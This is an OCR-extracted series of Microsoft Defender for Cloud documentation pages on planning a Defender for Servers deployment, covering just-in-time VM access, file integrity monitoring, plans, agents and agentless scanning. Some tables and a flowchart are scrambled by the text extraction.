e If you have virtual machines in multiple locations, Defender for Cloud creates 
multiple workspaces accordingly to ensure data compliance. 

e Default workspace names are in the format [subscription-id]-[geo]. 


Default workspaces 


Defender for Cloud default workspaces are created in the following locations: 


Server location Workspace location 

United States, Canada, Europe, United Kingdom, Korea, The workspace is created in the 
India, Japan, China, Australia matching location. 

Brazil United States 

East Asia, Southeast Asia Asia 


Custom workspaces 


You can store your server information in the default workspace or you can use a custom 
workspace. A custom workspace must meet these requirements: 


e You must enable the Defender for Servers plan in the custom workspace. 


e The custom workspace must be associated with the Azure subscription in which 
Defender for Cloud is enabled. 


e You must have at least read permissions for the workspace. 


e If the Security & Audit solution is installed in a workspace, Defender for Cloud uses 
the existing solution. 


Next steps 


e After you work through these planning steps, review Defender for Server access 
roles. 


e Check out the common questions about workspaces in Defender for Servers. 


Understanding just-in-time (JIT) VM 
access 
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This page explains the principles behind Microsoft Defender for Cloud's just-in-time (JIT) 
VM access feature and the logic behind the recommendation. 


To learn how to apply JIT to your VMs using the Azure portal (either Defender for Cloud 
or Azure Virtual Machines) or programmatically, see How to secure your management 
ports with JIT. 


The risk of open management ports on a 
virtual machine 


Threat actors actively hunt accessible machines with open management ports, like RDP 
or SSH. All of your virtual machines are potential targets for an attack. When a VM is 
successfully compromised, it's used as the entry point to attack further resources within 


your environment. 


Why JIT VM access is the solution 


As with all cybersecurity prevention techniques, your goal should be to reduce the 
attack surface. In this case that means having fewer open ports especially management 
ports. 


Your legitimate users also use these ports, so it's not practical to keep them closed. 


To solve this dilemma, Microsoft Defender for Cloud offers JIT. With JIT, you can lock 
down the inbound traffic to your VMs, reducing exposure to attacks while providing 
easy access to connect to VMs when needed. 


How JIT operates with network resources in 
Azure and AWS 


In Azure, you can block inbound traffic on specific ports, by enabling just-in-time VM 
access. Defender for Cloud ensures "deny all inbound traffic" rules exist for your 
selected ports in the network security group (NSG) and Azure Firewall rules. These rules 
restrict access to your Azure VMs’ management ports and defend them from attack. 


If other rules already exist for the selected ports, then those existing rules take priority 
over the new "deny all inbound traffic" rules. If there are no existing rules on the 
selected ports, then the new rules take top priority in the NSG and Azure Firewall. 


In AWS, by enabling JIT-access the relevant rules in the attached EC2 security groups, for 
the selected ports, are revoked which blocks inbound traffic on those specific ports. 


When a user requests access to a VM, Defender for Cloud checks that the user has Azure 
role-based access control (Azure RBAC) permissions for that VM. If the request is 
approved, Defender for Cloud configures the NSGs and Azure Firewall to allow inbound 
traffic to the selected ports from the relevant IP address (or range), for the amount of 
time that was specified. In AWS, Defender for Cloud creates a new EC2 security group 
that allows inbound traffic to the specified ports. After the time has expired, Defender 
for Cloud restores the NSGs to their previous states. Connections that are already 
established aren't interrupted. 


© Note 


JIT does not support VMs protected by Azure Firewalls controlled by Azure Firewall 
Manager. The Azure Firewall must be configured with Rules (Classic) and cannot 


use Firewall policies. 


How Defender for Cloud identifies which VMs 
should have JIT applied 


The following diagram shows the logic that Defender for Cloud applies when deciding 


how to categorize your supported VMs: 


Azure 


just-in-time VM access 
already enabled? 


No 
y 
Is the VM E d da b 
assigned to a network >Yes-> ave Allow rules No š 
for ports 22, 3389, | 


security group? 
B Bed 5985, & 5986? 


No Yes 


Is the VM protected 
by a firewall? 


Is the VM protected No 
by a firewall? E. 
Recommendation 
No Yes Yes to enable 
d _ just-in-time VM 
access 


Does the firewa 
i» have AIO rules for 
ports 22, 3389, 5985 


VM classified as 


‘Not-applicable’ 


When Defender for Cloud finds a machine that can benefit from JIT, it adds that 
machine to the recommendation's Unhealthy resources tab. 


Dashboard > Microsoft Defender for Cloud | Recommendations > 
Management ports of virtual machines should be < 
protected with just-in-time network access control 


“ Description 
Microsoft Defender for Cloud has identified some overly-permissive inbound rules for management ports in your Network Security Group. 


Enable just-in-time access control to protect your VM from internet-based brute-force attacks. Learn more. 


vw Remediation steps 


^ Affected resources 


Unhealthy resources (78) | Healthy resources (112) Not applicable resources (66) 


| Ø conto 
I Name M Subscription 
CJ EA contosoweb2 Contoso IT - demo 
Ee ContosoWeb1 Contoso IT - demo 
CJ Le] ContosoSQLSvr3 Contoso IT - demo 
Ee ContosoSQLSvr3 Contoso IT - demo 
g Q ContosoSQLSrv2 Contoso IT - demo 


Next steps 


This page explained why just-in-time (JIT) virtual machine (VM) access should be used. 


To learn how to enable JIT and request access to your JIT-enabled VMs: 


How to secure your management ports with JIT 


File Integrity Monitoring in Microsoft Defender for Cloud 
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File Integrity Monitoring (FIM) examines operating system files, Windows registries, application software, and Linux system files for 
changes that might indicate an attack. 


FIM (file integrity monitoring) uses the Azure Change Tracking solution to track and identify changes in your environment. When FIM 
is enabled, you have a Change Tracking resource of type Solution. If you remove the Change Tracking resource, you'll also disable 
the File Integrity Monitoring feature in Defender for Cloud. FIM lets you take advantage of Change Tracking directly in Defender for 
Cloud. For data collection frequency details, see Change Tracking data collection details. 


Defender for Cloud recommends entities to monitor with FIM, and you can also define your own FIM policies or entities to monitor. 


FIM informs you about suspicious activity such as: 


e File and registry key creation or removal 


e File modifications (changes in file size, access control lists, and hash of the content) 


e Registry modifications (changes in size, access control lists, type, and content) 


Many regulatory compliance standards require implementing FIM controls, such as PCI-DSS and ISO 17799. 


Which files should | monitor? 


When choosing which files to monitor, consider the files that are critical for your system and applications. Monitor files that you don’t 


expect to change without planning. If you choose files that are frequently changed by applications or operating system (such as log 


files and text files) it will create noise, making it difficult to identify an attack. 


Defender for Cloud provides the following list of recommended items to monitor based on known attack patterns. 


Linux files Windows files Windows registry keys (HKLM = HKEY_LOCAL_ MACHINE) 

/bin/login C:\autoexec.bat HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 
0\CryptSIPDIIRemoveSignedDataMsg{C689AAB8-8E78-1 1D0-8C47-00C04FC295EE} 

/bin/passwd CA\boot.ini HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 


/etc/*.conf 


C:config.sys 


O\CryptSIPDIIRemoveSignedDataMsg{603BCC1F-4B59-4E08-B724-D2C6297EF351} 


HK! 


LM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\SYSTEM.ini\boot 


/usr/bin C:\Windows\system. ini HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows 

/usr/sbin C:\Windows\win.ini HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

/bin C:\Windows\regedit.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 
/sbin C:\\Windows\System32\userinit.exe © HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 
/boot C:\Windows\explorer.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 


/usr/local/bin 


/usr/local/sbin 


C:\Program Files\Microsoft 
Security Client\msseces.exe 


HKI 


HKI 


LM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 


LM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx 


/opt/bin HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 

/opt/sbin HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce 

/etc/crontab HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 
O\CryptSIPDIIRemoveSignedDataMsg{C689AAB8-8E78-11D0-8C47-00C04FC295EE} 

/etc/init.d HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 


/etc/cron.hourly 


/etc/cron.daily 


/etc/cron.weekly 


O\CryptSIPDIIRemoveSignedDa 


HK 


LM\SOF1 


aMsg{603BCC1F-4B59-4E08-B724-D2C6297EF351} 


>TWARE\WOW6432Node\Microsoft\Windows 


NT\CurrentVersion\IniFileMapping\system.ini\boot 


HKI 


HK! 


LM\SOFT 


LM\SOFT 


TWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows 


TWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon 


Linux files Windows files Windows registry keys (HKLM = HKEY_LOCAL_ MACHINE) 


/etc/cron.monthly HK! 
HK! 
HK! 
HK! 
HK! 
HK! 
HK! 
HK! 
HKI 
HKI 


HKI 


LM\SOFT 


LM\SOFT 


LM\SOFT 


LM\SOFT 


LM\SOFT 


LM\SOFT 


LM\SOFT 


WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 
WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 
WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 
WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 
WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx 
WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices 


WARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce 


LM\SYSTEM\CurrentControlSet\Control\hivelist 
LM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs 
LM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile 


LM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile 


HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile 


Next steps 


In this article, you learned about File Integrity Monitoring (FIM) in Defender for Cloud. 


Next, you can: 


e Enable File Integrity Monitoring when using the Azure Monitor Agent 


e Enable File Integrity Monitoring when using the Log Analytics agent 


Plan roles and permissions for Defender 
for Servers 


Article e 05/10/2023 


This article helps you understand how to control access to your Defender for Servers 
deployment. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the third article in the Defender for Servers planning guide. Before you 
begin, review the earlier articles: 


1. Start planning your deployment 
2. Understand where your data is stored and Log Analytics workspace requirements 


Determine ownership and access 


In complex enterprises, different teams manage different security functions in the 


organization. 


It's critical that you identify ownership for server and endpoint security in your 

organization. Ownership that's undefined or hidden in organizational silos increases risk 
for the organization. Security operations (SecOps) teams that need to identify and follow 
threats across the enterprise are hindered. Deployments might be delayed or they might 


not be secure. 


Security leadership should identify the teams, roles, and individuals that are responsible 
for making and implementing decisions about server security. 


Responsibility usually is shared between a central IT team and a cloud infrastructure and 
endpoint security team. Individuals on these teams need Azure access rights to manage 
and use Defender for Cloud. As part of planning, determine the right level of access for 
individuals based on the Defender for Cloud role-based access control (RBAC) model. 


Defender for Cloud roles 


In addition to the built-in Owner, Contributor, and Reader roles for an Azure 
subscription and resource group, Defender for Cloud has built-in roles that control 


Defender for Cloud access: 


e Security Reader: Provides viewing rights to Defender for Cloud recommendations, 
alerts, security policy, and states. This role can't make changes to Defender for 
Cloud settings. 

e Security Admin: Provides Security Reader rights and the ability to update security 
policy, dismiss alerts and recommendations, and apply recommendations. 


Learn more about allowed role actions. 


Next steps 


After you work through these planning steps, decide which Defender for Servers plan is 
right for your organization. 


Select a Defender for Servers plan 


Article e 08/01/2023 


This article helps you select the Microsoft Defender for Servers plan that's right for your 
organization. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the fourth article in the Defender for Servers planning guide. Before you 


begin, review the earlier articles: 


1. Start planning your deployment 
2. Understand where your data is stored and Log Analytics workspace requirements 
3. Review access and role requirements 


Review plans 


You can choose from two Defender for Servers paid plans: 


e Defender for Servers Plan 1 is entry-level and must be enabled at the subscription 


level. Features include: 


o Foundational cloud security posture management (CSPM), which is provided 
free by Defender for Cloud. 

o For Azure virtual machines and Amazon Web Services (AWS) and Google 
Cloud Platform (GCP) machines, you don't need a Defender for Cloud plan 
enabled to use foundational CSPM features. 

o For on-premises server, to receive configuration recommendations machines 
must be onboarded to Azure with Azure Arc, and Defender for Servers must 
be enabled. 


o Endpoint detection and response (EDR) features that are provided by Microsoft 


Defender for Endpoint Plan 2. 


e Defender for Servers Plan 2 provides all features. The plan must be enabled at the 
subscription level and at the workspace level to get full feature coverage. Features 
include: 

o All the functionality that's provided by Defender for Servers Plan 1. 
o More extended detection and response (XDR) capabilities. 


© Note 


Plan 1 and Plan 2 for Defender for Servers aren't the same as Plan 1 and Plan 2 for 


Defender for Endpoint. 


Plan features 


Feature 


Defender for 
Endpoint 
integration 


Licensing 


Defender for 
Endpoint 
provisioning 


Unified view 


Threat detection 
for OS-level 
(agent-based) 


Details Plan 1 


Defender for Servers integrates with Defender for © 
Endpoint and protects servers with all the features, 
including: 


- Attack surface reduction to lower the risk of attack. 


- Next-generation protection, including real-time 
scanning and protection and Microsoft Defender 
Antivirus. 


- EDR, including threat analytics, automated 
investigation and response, advanced hunting, and 
Microsoft Defender Experts. 


- Vulnerability assessment and mitigation provided 
by Microsoft Defender Vulnerability Management 
(MDVM) as part of the Defender for Endpoint 
integration. With Plan 2, you can get premium 
MDVM features, provided by the MDVM add-on. 


Defender for Servers covers licensing for Defender © 
for Endpoint. Licensing is charged per hour instead 

of per seat, lowering costs by protecting virtual 

machines only when they're in use. 


Defender for Servers automatically provisions the (v) 
Defender for Endpoint sensor on every supported 
machine that's connected to Defender for Cloud. 


Defender for Endpoint alerts appear in the Defender © 
for Cloud portal. You can get detailed information in 
the Defender for Endpoint portal. 


Defender for Servers and Defender for Endpoint (v) 
detect threats at the OS level, including virtual Provided by 
machine behavioral detections and fileless attack MDE 


detection, which generates detailed security alerts 


Plan 
2 


Feature 


Threat detection 
for network-level 
(agentless security 
alerts) 


Microsoft Defender 
Vulnerability 
Management 
(MDVM) Add-on 


Security Policy and 
Regulatory 
Compliance 


Qualys 
vulnerability 
assessment 


Adaptive 
application 
controls 


Free data ingestion 
(500 MB) to Log 
Analytics 
workspaces 


Just-in-time virtual 
machine access 


Details 


that accelerate alert triage, correlation, and 
downstream response time. 


Learn more about alerts for Windows machines 


Learn more about alerts for Linux machines 


Learn more about alerts for DNS 


Defender for Servers detects threats that are directed 
at the control plane on the network, including 
network-based security alerts for Azure virtual 
machines. 


Enhance your vulnerability management program 
consolidated asset inventories, security baselines 
assessments, application block feature, and more. 
Learn more. 


Customize a security policy for your subscription and 
also compare the configuration of your resources 
with requirements in industry standards, regulations, 
and benchmarks. Learn more about regulatory 
compliance and security policies 


As an alternative to Defender Vulnerability 
Management, Defender for Cloud can deploy a 
Qualys scanner and display the findings. You don't 
need a Qualys license or account. 


Adaptive application controls define allowlists of 
known safe applications for machines. To use this 
feature, Defender for Cloud must be enabled on the 
subscription. 


Free data ingestion is available for specific data types 
to Log Analytics workspaces. Data ingestion is 
calculated per node, per reported workspace, and 
per day. It's available for every workspace that has a 
Security or AntiMalware solution installed. 


Just-in-time virtual machine access locks down 
machine ports to reduce the attack surface. To use 
this feature, Defender for Cloud must be enabled on 
the subscription. 


Plan 1 


Not 
supported 
in Plan 1 


Not 
supported 
in Plan 1 


Not 
supported 
in Plan 1 


Not 
supported 
in Plan 1 


Not 
supported 
in Plan 1 


Not 
supported 
in Plan 1 


Not 
supported 
in Plan 1 


Plan 
2 


Feature Details Plan 1 Plan 


2 
Adaptive network Network hardening filters traffic to and from Not Lv] 
hardening resources by using network security groups (NSGs) supported 
to improve your network security posture. Further in Plan 1 
improve security by hardening the NSG rules based 
on actual traffic patterns. To use this feature, 
Defender for Cloud must be enabled on the 
subscription. 
File integrity File integrity monitoring examines files and registries Not Lv] 
monitoring for changes that might indicate an attack. A supported 
comparison method is used to determine whether in Plan 1 
suspicious modifications have been made to files. 
Docker host Assesses containers hosted on Linux machines Not © 
hardening running Docker containers, and then compares them supported 
with the Center for Internet Security (CIS) Docker in Plan 1 
Benchmark. 
Network map Provides a geographical view of recommendations Not © 
for hardening your network resources. supported 
in Plan 1 
Agentless scanning Scans Azure virtual machines by using cloud APIs to Not © 
collect data. supported 
in Plan 1 
© Note 


Once a plan is enabled, a 30-day trial period begins. There is no way to stop, pause, 
or extend this trial period. To enjoy the full 30-day trial, make sure to plan ahead to 


meet your evaluation purposes. 


Select a vulnerability assessment solution 


A couple of vulnerability assessment options are available in Defender for Servers: 


e Microsoft Defender Vulnerability Management: Integrated with Defender for 
Endpoint. 


o Available in Defender for Servers Plan 1 and Defender for Servers Plan 2. 


o Defender Vulnerability Management is enabled by default on machines that are 
onboarded to Defender for Endpoint. 


o Has the same Windows, Linux, and network prerequisites as Defender for 
Endpoint. 


o No extra software is required. 


© Note 


Microsoft Defender Vulnerability Management Add-on capabilities are 
included in Defender for Servers Plan 2. This provides consolidated 
inventories, new assessments, and mitigation tools to further enhance your 
vulnerability management program. To learn more, see Vulnerability 
Management capabilities for servers. 


Defender Vulnerability Management add-on capabilities are only available 
through the Microsoft Defender 365 portal”. 


e Qualys vulnerability scanner: Provided by Defender for Cloud Qualys integration. 

o Available only in Defender for Servers Plan 2. 

o A great fit if you're using a third-party EDR solution or a Fanotify-based 
solution. In these scenarios, you might not be able to deploy the Defender for 
Endpoint for vulnerability assessment. 

o The integrated Defender for Cloud Qualys solution doesn't support a proxy 
configuration, and it can't connect to an existing Qualys deployment. 
Vulnerability findings are available only in Defender for Cloud. 


Next steps 


After you work through these planning steps, review Azure Arc and agent and extension 
requirements. 


Plan agents, extensions, and Azure Arc 
for Defender for Servers 
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This article helps you plan your agents, extensions, and Azure Arc resources for your 
Microsoft Defender for Servers deployment. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the fifth article in the Defender for Servers planning guide. Before you 


begin, review the earlier articles: 


1. Start planning your deployment 

2. Understand where your data is stored and Log Analytics workspace requirements 
3. Review Defender for Servers access roles 

4. Select a Defender for Servers plan 


Review Azure Arc requirements 


Azure Arc helps you onboard Amazon Web Services (AWS), Google Cloud Platform 
(GCP), and on-premises machines to Azure. Defender for Cloud uses Azure Arc to 
protect non-Azure machines. 


Foundational cloud security posture management 


For free foundational cloud security posture management (CSPM) features, Azure Arc 
running on AWS or GCP machines isn't required. For full functionality, we recommend 
that you do have Azure Arc running on AWS or GCP machines. 


Azure Arc onboarding is required for on-premises machines. 


Defender for Servers plan 


To use Defender for Servers, all AWS, GCP, and on-premises machines should be Azure 
Arc-enabled. 


You can onboard the Azure Arc agent to your AWS or GCP servers automatically with the 
AWS or GCP multicloud connector. 


Plan for Azure Arc deployment 

To plan for Azure Arc deployment: 
1. Review the Azure Arc planning recommendations and deployment prerequisites. 
2. Open the network ports for Azure Arc in your firewall. 


3. Azure Arc installs the Connected Machine agent to connect to and manage 
machines that are hosted outside of Azure. Review the following information: 


e The agent components and data collected from machines. 
e Network and internet access for the agent. 
e Connection options for the agent. 


Log Analytics agent and Azure Monitor agent 


Defender for Cloud uses the Log Analytics agent and the Azure Monitor agent to collect 
information from compute resources. Then, it sends the data to a Log Analytics 
workspace for more analysis. Review the differences and recommendations for both 


agents. 


The following table describes the agents that are used in Defender for Servers: 


Feature Log Azure Monitor agent 
Analytics 
agent 
Foundational CSPM recommendations (free) © © 
that depend on the agent: OS baseline 
recommendation (Azure VMs) With the Azure Monitor agent, the 


Azure Policy guest configuration 
extension is used. 


Foundational CSPM: System updates © Not yet available. 
recommendations (Azure VMs) 


Foundational CSPM: Antimalware/endpoint © © 
protection recommendations (Azure VMs) 


Feature Log Azure Monitor agent 


Analytics 

agent 
Attack detection at the OS level and network © © 
layer, including fileless attack detection 

Plan 2 Plan 2 
Plan 1 relies on Defender for Endpoint 
capabilities for attack detection. 
File integrity monitoring (Plan 2 only) © © 
Adaptive application controls (Plan 2 only) OO © 


Qualys extension 


The Qualys extension is available in Defender for Servers Plan 2. The extension is 
deployed if you want to use Qualys for vulnerability assessment. 


Here's more information: 


e The Qualys extension sends metadata for analysis to one of two Qualys datacenter 
regions, depending on your Azure region. 
o If you're in a European Azure geography, data is processed in the Qualys 
European datacenter. 
o For other regions, data is processed in the US datacenter. 


e To use Qualys on a machine, the extension must be installed and the machine must 
be able to communicate with the relevant network endpoint: 
o Europe datacenter: https://qagpublic.qg2.apps.qualys.eu 
o US datacenter: https://gagpublic.qg3.apps.qualys.com 


Guest configuration extension 


The extension performs audit and configuration operations inside VMs. 


e |f you're using the Azure Monitor Agent, Defender for Cloud uses this extension to 
analyze operating system security baseline settings on Windows and Linux 
machines. 

e Although Azure Arc-enabled servers and the guest configuration extension are 
free, more costs might apply if you use guest configuration policies on Azure Arc 
servers outside the scope of Defender for Cloud. 


Learn more about the Azure Policy guest configuration extension. 


Defender for Endpoint extensions 


When you enable Defender for Servers, Defender for Cloud automatically deploys a 
Defender for Endpoint extension. The extension is a management interface that runs a 
script inside the operating system to deploy and integrate the Defender for Endpoint 
sensor on the machine. 


e Windows machines extension: MDE.Windows 
e Linux machines extension: MDE. Linux 
e Machines must meet minimum requirements. 


e Some Windows Server versions have specific requirements. 


Verify operating system support 


Before you deploy Defender for Servers, verify operating system support for agents and 
extensions: 


e Verify that your operating systems are supported by Defender for Endpoint. 

e Check requirements for the Azure Arc Connect Machine agent. 

e Check operating system support for the Log Analytics agent and Azure Monitor 
agent. 


Review agent provisioning 


When you enable Defender for Cloud plans, including Defender for Servers, you can 
choose to automatically provision some agents that are relevant for Defender for 


Servers: 


e Log Analytics agent and Azure Monitor agent for Azure VMs 

e Log Analytics agent and Azure Monitor agent for Azure Arc VMs 
e Qualys agent 

e Guest configuration agent 


When you enable Defender for Servers Plan 1 or Plan 2, the Defender for Endpoint 
extension is automatically provisioned on all supported machines in the subscription. 


Provisioning considerations 


The following table describes provisioning considerations to be aware of: 


Provisioning Details 


Provisioning 


Defender for 


Details 


If machines are running Microsoft Antimalware, also known as System Center 


Endpoint Endpoint Protection (SCEP), the Windows extension automatically removes it from 

sensor the machine. 
If you deploy on a machine that already has the legacy Microsoft Monitoring 
agent (MMA) Defender for Endpoint sensor running, after the Defender for Cloud 
and Defender for Endpoint unified solution is successfully installed, the extension 
stops and it disables the legacy sensor. The change is transparent and the 
machine's protection history is preserved. 

AWS and Configure automatic provisioning when you set up the AWS or GCP connector. 

GCP 

machines 

Manual If you don't want Defender for Cloud to provision the Log Analytics agent and 

installation Azure Monitor agent, you can install agents manually. 


Log Analytics 


You can connect the agent to the default Defender for Cloud workspace or to a 
custom workspace. 


The workspace must have the SecurityCenterFree (for free foundational CSPM) or 
Security solution enabled (Defender for Servers Plan 2). 


If a Windows VM has the Log Analytics agent running but not as a VM extension, 


agent Defender for Cloud installs the extension. The agent reports to the Defender for 
running Cloud workspace and to the existing agent workspace. 
directly 
On Linux VMs, multi-homing isn't supported. If an existing agent exists, the Log 
Analytics agent isn't automatically provisioned. 
Operations The Log Analytics agent can work side by side with the Operations Manager 
Manager agent. The agents share common runtime libraries that are updated when the Log 
agent Analytics agent is deployed. 
Removing If you remove the Log Analytics extension, Defender for Cloud can't collect 
the Log security data and recommendations, and alerts will be missing. Within 24 hours, 
Analytics Defender for Cloud determines that the extension is missing and reinstalls it. 
extension 


When to opt out of auto provisioning 


You might want to opt out of automatic provisioning in the circumstances that are 
described in the following table: 


Relevant Details 


agent 


Situation 


Situation 


You have critical VMs that 
shouldn't have agents 
installed 


You're running the System 
Center Operations Manager 
agent version 2012 with 
Operations Manager 2012 


You want to configure a 
custom workspace 


Next steps 


Relevant 
agent 


Log 
Analytics 
agent, 
Azure 
Monitor 
agent 


Log 
Analytics 
agent 


Log 
Analytics 
agent, 
Azure 
Monitor 
agent 


Details 


Automatic provisioning is for an entire 
subscription. You can't opt out for specific 
machines. 


With this configuration, don't turn on automatic 
provisioning. Management capabilities might be 
lost. 


You have two options with a custom workspace: 


- Opt out of automatic provisioning when you first 
set up Defender for Cloud. Then, configure 
provisioning on your custom workspace. 


- Let automatic provisioning run to install the Log 
Analytics agents on machines. Set a custom 
workspace, and then reconfigure existing VMs with 
the new workspace setting. 


After working through these planning steps, you can start deployment: 


e Enable Defender for Servers plans 


e Connect on-premises machines to Azure. 


e Connect AWS accounts to Defender for Cloud. 


e Connect GCP projects to Defender for Cloud. 


e Learn about scaling your Defender for Server deployment. 


Learn about agentless scanning 
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Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends 
beyond the reach of agent-based assessments. With agentless scanning for VMs, you 
can get frictionless, wide, and instant visibility on actionable posture issues without 


installed agents, network connectivity requirements, or machine performance impact. 


Agentless scanning for VMs provides vulnerability assessment and software inventory, 
both powered by Microsoft Defender Vulnerability Management, in Azure and Amazon 
AWS environments. Agentless scanning is available in both Defender Cloud Security 
Posture Management (CSPM) and Defender for Servers P2. 


Availability 


Aspect Details 
Release state: GA 
Pricing: Requires either Defender Cloud Security Posture Management (CSPM) or 


Microsoft Defender for Servers Plan 2 


Supported use Lv] Vulnerability assessment (powered by Defender Vulnerability 

cases: Management) 
(v) Software inventory (powered by Defender Vulnerability Management) 
© Secret scanning (Preview) 


Clouds: (v Azure Commercial clouds 
* Azure Government 
* Microsoft Azure operated by 21Vianet 
(v) Connected AWS accounts 
(v) Connected GCP projects 


Operating systems: © Windows 


OO Linux 


Instance and disk Azure 
types: Lv] Standard VMs 
* Unmanaged disks 
Lv] Virtual machine scale set - Flex 
* Virtual machine scale set - Uniform 


AWS 
© c2 


© Auto Scale instances 


Aspect Details 


* Instances with a ProductCode (Paid AMIs) 


GCP 
Lv] Compute instances 
Lv] Instance groups (managed and unmanaged) 


Encryption: Azure 
OO Unencrypted 
Encrypted — managed disks using Azure Storage encryption with 
platform-managed keys (PMK) 
* Encrypted — other scenarios using platform-managed keys (PMK) 
* Encrypted — customer-managed keys (CMK) 


AWS 

OO Unencrypted 

(v) Encrypted - PMK 
Lv] Encrypted - CMK 


GCP 

(v) Google-managed encryption key 

(v Customer-managed encryption key (CMEK) 
* Customer-supplied encryption key (CSEK) 


How agentless scanning for VMs works 


While agent-based methods use OS APIs in runtime to continuously collect security 
related data, agentless scanning for VMs uses cloud APIs to collect data. Defender for 
Cloud takes snapshots of VM disks and does an out-of-band, deep analysis of the OS 
configuration and file system stored in the snapshot. The copied snapshot doesn't leave 
the original compute region of the VM, and the VM is never impacted by the scan. 


After the necessary metadata is acquired from the disk, Defender for Cloud immediately 
deletes the copied snapshot of the disk and sends the metadata to Microsoft engines to 
analyze configuration gaps and potential threats. For example, in vulnerability 
assessment, the analysis is done by Defender Vulnerability Management. The results are 
displayed in Defender for Cloud, seamlessly consolidating agent-based and agentless 
results. 


The scanning environment where disks are analyzed is regional, volatile, isolated, and 
highly secure. Disk snapshots and data unrelated to the scan aren't stored longer than is 
necessary to collect the metadata, typically a few minutes. 


Customer account Isolated scanning environment Defender for Cloud portal 


Regional environment 


Vulnerability assessment 


b 


Scanning platform 


Virtual machine 


Disk snapshot 


Next steps 


This article explains how agentless scanning works and how it helps you collect data 
from your machines. 


e Learn more about how to enable agentless scanning for VMs. 


e Check out common questions about agentless scanning and how it affects the 
subscription/account, agentless data collection, and permissions used by agentless 


scanning. 


Scale a Defender for Servers 
deployment 
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This article helps you scale your Microsoft Defender for Servers deployment. 


Defender for Servers is one of the paid plans provided by Microsoft Defender for Cloud. 


Before you begin 


This article is the sixth and final article in the Defender for Servers planning guide series. 
Before you begin, review the earlier articles: 


1. Start planning your deployment 

2. Understand where your data is stored and Log Analytics workspace requirements 
3. Review access and role requirements 

4. Select a Defender for Servers plan 

5. Review requirements for agents, extensions, and Azure Arc resources 


Scaling overview 
When you enable a Defender for Cloud subscription, this process occurs: 


1. The microsoft.security resource provider is automatically registered on the 
subscription. 

2. At the same time, the Cloud Security Benchmark initiative that's responsible for 
creating security recommendations and calculating the secure score is assigned to 
the subscription. 

3. After you enable Defender for Cloud on the subscription, you turn on Defender for 
Servers Plan 1 or Defender for Servers Plan 2, and then you enable auto 


provisioning. 


In the next sections, review considerations for specific steps as you scale your 
deployment: 


e Scale a Cloud Security Benchmark deployment 
e Scale a Defender for Servers plan 


e Scale auto provisioning 


Scale a Cloud Security Benchmark deployment 


In a scaled deployment, you might want the Cloud Security Benchmark (formerly the 
Azure Security Benchmark) to be automatically assigned. 


The assignment is inherited for every existing and future subscription in the 
management group. To set up your deployment to automatically apply the benchmark, 
assign the policy initiative to your management group (root) instead of to each 
subscription. 


You can get the Azure Security Benchmark policy definition on GitHub Z. 


Learn more about using a built-in policy definition to register a resource provider. 


Scale a Defender for Servers plan 


You can use a policy definition to enable Defender for Servers at scale: 


e To get the built-in Configure Azure Defender for Servers to be enabled policy 
definition, in the Azure portal for your deployment, go to Azure Policy > Policy 


Definitions. 


Home > Policy 


5) Policy | Definitions ~ x 


2 Search | +- Policy definition -+ Initiative definition Ç) Refresh 
© Overview Search 
i Getting started Defender for Server Scope : 18 selected Definition type : All definition types Policy type: All policy types Category : All categories 


[À Compliance 
Name tl Definition location 1! Polic... tL Type 1 Definition type 1! Category t 
e Remediation 


Builtin Policy Security Center 


£ Events 
Azure Defender for servers should be enabled Builtin Policy Security Center 


Authoring 
Definitions Q 


©) Assignments 


© Exemptions 


e Alternatively, you can use a custom policy? to enable Defender for Servers and 
select the plan at the same time. 


e You can enable only one Defender for Servers plan on each subscription. You can't 
enable both Defender for Servers Plan 1 and Plan 2 at the same subscription. 


e |f you want to use both plans in your environment, divide your subscriptions into 
two management groups. On each management group, assign a policy to enable 
the respective plan on each underlying subscription. 


Scale auto provisioning 


You can set up auto provisioning by assigning the built-in policy definitions to an Azure 
management group to cover underlying subscriptions. The following table summarizes 
the definitions: 


Agent 


Log Analytics agent (default 
workspace) 


Log Analytics agent (custom 
workspace) 


Azure Monitor agent (default 
data collection rule) 


Azure Monitor agent (custom 
data collection rule) 


Qualys vulnerability 
assessment 


Guest configuration extension 


Policy 


Enable Security Center's autoprovisioning of the Log Analytics 
agent on your subscriptions with default workspaces 


Enable Security Center's autoprovisioning of the Log Analytics 
agent on your subscriptions with custom workspaces 


[Preview]: Configure Arc machines to create the default Microsoft 
Defender for Cloud pipeline using Azure Monitor Agent 


